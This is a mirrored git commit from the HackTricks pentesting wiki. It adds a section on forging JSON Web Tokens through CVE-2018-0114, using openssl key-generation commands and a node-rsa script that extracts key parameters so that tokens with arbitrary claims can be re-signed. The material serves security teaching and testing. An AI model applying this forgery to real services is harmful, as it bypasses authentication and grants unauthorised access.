mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [master] one page and one asset modified
This commit is contained in:
parent
f518621c68
commit
9ffcb20c53
BIN
.gitbook/assets/image (436).png
Normal file
BIN
.gitbook/assets/image (436).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 155 KiB |
|
@ -131,6 +131,34 @@ Try to change this header to an URL under your control and check if any request
|
|||
|
||||
You can also abuse both of these vulns if Open redirects, header injection or if you can upload a file inside the server and the server is just whitelisting the domain and not the path.
|
||||
|
||||
## Embedded Public Key \(CVE-2018-0114\)
|
||||
|
||||
If the JWT has embedded a public key like in the following scenario:
|
||||
|
||||
![](../.gitbook/assets/image%20%28436%29.png)
|
||||
|
||||
It's possible to generate a new private/public key, embeded the new public key inside the token and use it to generate a new signature:
|
||||
|
||||
```bash
|
||||
openssl genrsa -out keypair.pem 2048
|
||||
openssl rsa -in keypair.pem -pubout -out publickey.crt
|
||||
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
|
||||
```
|
||||
|
||||
You can obtain the "n" and "e" using this nodejs script:
|
||||
|
||||
```bash
|
||||
const NodeRSA = require('node-rsa');
|
||||
const fs = require('fs');
|
||||
keyPair = fs.readFileSync("keypair.pem");
|
||||
const key = new NodeRSA(keyPair);
|
||||
const publicComponents = key.exportKey('components-public');
|
||||
console.log('Parameter n: ', publicComponents.n.toString("hex"));
|
||||
console.log('Parameter e: ', publicComponents.e.toString(16));
|
||||
```
|
||||
|
||||
Finally, using the public and private key and the new "n" and "e" values you can use [jwt.io](https://jwt.io/) to forge a new valid JWT with any information.
|
||||
|
||||
## JWT Registered claims
|
||||
|
||||
{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml\#claims" caption="" %}
|
||||
|
|
Loading…
Reference in a new issue